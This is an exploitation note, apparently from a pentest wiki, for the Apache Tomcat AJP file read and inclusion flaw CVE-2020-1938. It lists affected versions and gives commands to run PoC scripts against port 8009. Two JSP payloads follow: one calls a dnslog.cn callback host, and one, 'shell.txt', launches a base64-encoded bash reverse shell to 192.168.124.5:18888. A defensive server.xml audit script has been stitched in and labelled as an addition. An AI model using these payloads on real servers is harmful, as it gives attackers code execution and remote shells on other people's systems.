# Tomcat file inclusion and file read vulnerability (CVE-2020-1938)
==Affected versions==
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x
==Prerequisites==
The target has the AJP Connector service port open (enabled by default, on port 8009).
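As an added defensive check (not part of the original note): a small Python script that parses a Tomcat server.xml and reports any AJP connector reachable beyond loopback with no shared secret, which is exactly the exposed configuration this prerequisite describes. The two server.xml fragments are constructed samples; `address`, `secret` and `secretRequired` are Tomcat's own AJP connector attributes (the latter two exist only in the fixed releases, 7.0.100 / 8.5.51 / 9.0.31 and later).

```python
import xml.etree.ElementTree as ET

# Constructed server.xml fragments (sample data, not taken from any real host).
# WEAK: the pre-fix default, AJP on 8009 bound to every interface, no secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

# HARDENED: loopback only plus a shared secret the reverse proxy must present.
# "PLACEHOLDER-SECRET" is a stand-in, not a value to deploy.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="PLACEHOLDER-SECRET"/>
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP connector in a Tomcat server.xml string."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue
        # Before the fix the default bind address was all interfaces, so an
        # absent 'address' attribute is treated as exposed.
        address = conn.get("address", "0.0.0.0")
        has_secret = bool(conn.get("secret"))
        exposed = address not in LOOPBACK
        findings.append({
            "port": conn.get("port"),
            "address": address,
            "exposed": exposed,
            "secret_configured": has_secret,
            # Reachable beyond loopback with no secret: anything that can hit
            # the port can speak AJP to Tomcat directly (the CVE precondition).
            "at_risk": exposed and not has_secret,
        })
    return findings


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        for finding in audit_ajp_connectors(xml):
            print(label, finding)
```

If the AJP connector is not needed at all, commenting it out of server.xml removes the exposure entirely; the script only reports, it does not change the file.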
==File read & file inclusion RCE==
File read:
python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 127.0.0.1
File inclusion:
python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1
test.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("ping fiohed.dnslog.cn").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>"); // wrap the command output in a <pre> block
while((a=in.read(b))!=-1){
out.println(new String(b, 0, a)); // print only the bytes actually read
}
out.print("</pre>");
%>
==Getshell==
shell.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC41LzE4ODg4IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>"); // wrap the command output in a <pre> block
while((a=in.read(b))!=-1){
out.println(new String(b, 0, a)); // print only the bytes actually read
}
out.print("</pre>");
%>
==Other==
*The reverse-shell command must be bash-encoded before it is passed to Runtime.exec().
*Online bash encoder: http://www.jackson-t.ca/runtime-exec-payloads.html
*PoC download: https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read